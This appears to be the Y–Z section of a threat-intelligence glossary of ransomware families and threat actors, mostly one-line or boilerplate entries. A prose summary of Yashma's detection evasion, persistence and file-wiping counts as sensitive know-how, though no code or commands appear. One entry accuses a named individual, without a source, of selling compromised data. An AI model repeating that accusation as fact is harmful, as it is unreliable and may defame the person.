Ransomware.

Yashma

Cisco Talos has identified a new, previously unknown threat actor of Vietnamese origin conducting a ransomware operation that began at least on June 4, 2023. The ongoing attack utilizes a variant of the Yashma ransomware, likely targeting multiple geographical areas and mimicking the characteristics of WannaCry. The threat actor uses an unusual technique to deliver the ransom note: instead of embedding the ransom note strings in the binary, the actor downloads the ransom note from a GitHub repository controlled by the actor by executing an embedded batch file. Talos stated that this threat actor targets victims in English-speaking countries, Bulgaria, China, and Vietnam, as the GitHub account of the actor "nguyenvientphat" contains ransom notes written in the languages of these countries. The presence of the ransom notes may indicate that the actor intends to expand its geographical area of operation. The company also stated that the threat actor may be of Vietnamese origin because the GitHub account name and the email contact in the ransom notes imitate the name of a legitimate organization. The ransom note also asks victims to make contact between 19:00 and 23:00 UTC+07:00, coinciding with the Vietnam time zone. A difference was also identified in the Vietnamese-language ransom note, which begins with "Sorry, your file is encrypted!" compared to the other notes that state "Oops, your files are encrypted!". By saying "sorry," the threat actor may intend to show greater sensitivity to victims in Vietnam, indicating that the attackers themselves are Vietnamese. Talos further mentioned that the threat actor started the campaign around June 4, 2023, as they joined GitHub and created a public repository called "Ransomware." In the repository, the threat actor added text files of ransom notes in five languages: English, Bulgarian, Vietnamese, simplified Chinese, and traditional Chinese.
The note presents the email address "nguyenvietphat[.]n@gmail[.]com," for victims to contact them. At the time of analysis, no Bitcoin was observed in the wallet, and the ransom note did not specify an amount, indicating that the ransomware operation could still be in its early stages. The threat actor deployed a variant of the Yashma ransomware, which they compiled on June 4, 2023. It is worth noting that Yashma is a 32-bit executable written in .NET and a renamed version of the Chaos Ransomware V5, which appeared in May 2022. In the variant, most of Yashma's features remained unchanged and were described by BlackBerry security researchers, with some notable modifications. The ransomware stores the ransom note text as strings in the binary, but this Yashma variant executes an embedded batch file, which contains the commands to download the ransom note from the actor-controlled GitHub repository. This modification avoids endpoint detection solutions and antivirus software, which typically detect embedded ransom note strings in the binary. Previous versions of Yashma established persistence on the victim's machine in the Run registry key and by dropping a Windows shortcut file pointing to the executable path of the ransomware in the startup folder. The identified variant also established persistence in the Run registry key. However, it was modified to create a ".url" favorites file in the startup folder pointing to the executable located in "%AppData%\Roaming\svchost.exe." Additionally, the threat actor chose to maintain Yashma's anti-recovery capability in this variant. After encrypting a file, the ransomware wipes the content of the original unencrypted files, writes a single "?" character, and then deletes the file. This technique makes it more difficult for incident responders and forensic analysts to recover deleted files from the victim's hard drive.

Yatron

ransomware

Ymir

Ymir is an active extortion or ransomware group tracked by RansomLook.

Yogynicof

ransomware

YoroTrooper

YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.

Yoshikada

ransomware

You Have Been Hacked!!!

Ransomware. Attempts to steal passwords.

YouAreFucked Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

YourRansom Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. This hacker demands that the victim contact him through email, and decrypts the files for FREE (more info in the link below).

Yulong Flood

Microsoft threat actor profile. Origin/Threat: China, Influence operations.

Yurei

Yurei is an active extortion or ransomware group tracked by RansomLook.

YYTO Ransomware

Uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt.

YYYYBJQOQDU

ransomware

Z-Pentest Alliance

Z-Pentest Alliance is a pro-Russian hacktivist group known for targeting industrial control systems and operational technology systems, particularly in Italy and Israel. The group has claimed responsibility for various attacks, including gaining control of a water supply management system and disrupting aviation authorities' websites. Z-Pentest Alliance operates within a larger alliance of hacktivist groups, often collaborating on politically motivated operations, including DDoS campaigns. The group has been linked to the GRU and is associated with the NoName057 group, sharing tools and intelligence.

Z3

ransomware

Zack Korman

Self-proclaimed ethical hacker who publishes detailed breach guides for profit. Operates under the guise of security research while selling access to compromised data on forums. Known for aggressive marketing of his courses.

ZariqaCrypt

ransomware

Zarya

Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.

Zcrypt

Ransomware

ZekwaCrypt Ransomware

First spotted in May 2016, it made a big comeback in January 2017. It is directed at English-speaking users and is therefore able to infect victims worldwide. The ransomware is spread with the help of email spam, fake ads, fake updates and infected install files.

Zelta Free

ransomware

ZenCrypt

ransomware

Zenis Ransomware

A new ransomware called Zenis Ransomware was discovered this week by MalwareHunterTeam. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not only encrypts your files but also purposely deletes your backups.

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology

Zeon

Zeon is an active extortion or ransomware group tracked by RansomLook.

Zeoticus

ransomware

zeoticus2

zeoticus2 is an active extortion or ransomware group tracked by RansomLook.

Zeppelin

ransomware

Zero-Fucks

ransomware

Zero Tolerance Gang Ztg

Zero Tolerance Gang Ztg is an active extortion or ransomware group tracked by RansomLook.

ZeroCrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

ZeroLocker

ransomware

Zerolockersec

Zerolockersec is an active extortion or ransomware group tracked by RansomLook.

Zeronine

ransomware

ZeroRansom

ransomware

ZeroSevenGroup

ZeroSevenGroup is a threat actor that claims to have breached a U.S. branch of Toyota, stealing 240GB of sensitive data, including employee and customer information, contracts, and financial details. They have also allegedly gained full network access to critical Israeli infrastructure, with access to 80TB of sensitive data across various sectors. The group has threatened to use the stolen data for malicious activities, including ransomware attacks. Their operations involve exploiting vulnerabilities, as indicated by their reference to manipulating memory through buffer overflow techniques.

Zeta Leaks

Zeta Leaks is an active extortion or ransomware group tracked by RansomLook.

Zetarink

Zetarink is an active extortion or ransomware group tracked by RansomLook.

Zhen

ransomware

Ziggy

ransomware

Zilla

ransomware

Zimbra

Ransomware mpritsken@priest.com

ZimbraCryptor

ransomware

ZinoCrypt Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

ZipLocker

ransomware

Zipper

ransomware

Zircon

Zircon is an active extortion or ransomware group tracked by RansomLook.

zixer2

zixer2 is an active extortion or ransomware group tracked by RansomLook.

Zlader

Ransomware VaultCrypt family

Zloader Threat Actors

This object reflects the TTPs used by threat actors to distribute and deploy the Zloader trojan malware. Researchers have observed actors distributing Zloader in campaigns without attributing the activity to named adversaries, such as the operations described by ESET researchers cited in the References.[[WeLiveSecurity April 19 2022](/references/f86845b9-03c4-446b-845f-b31b79b247ee)] TTPs associated with Zloader binaries themselves can be found in the separate "Zloader" Software object.

Zola

Zola is an active extortion or ransomware group tracked by RansomLook.

Zoldon

ransomware

ZOMBIE SPIDER

On April 7, 2017, Pytor Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.

ZooPark

ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.

Zorab

ransomware

ZorgoCry

ransomware

Zorro

Ransomware

zScreenLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, so anyone can be harmed. The hacker spreads the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

ZXZ Ransomware

Written in English, so it could affect users worldwide; however, so far there have only been reports from Saudi Arabia. The malware name assigned by Windows server tools is win32/wagcrypt.A.

Zyka Ransomware

It is directed at English-speaking users and is therefore able to infect victims worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including music, MS Office, Open Office, pictures, videos, shared online files etc. The ransom is 170 USD or EUR, paid in Bitcoin.

Zyklon

Ransomware Hidden Tear family, GNL Locker variant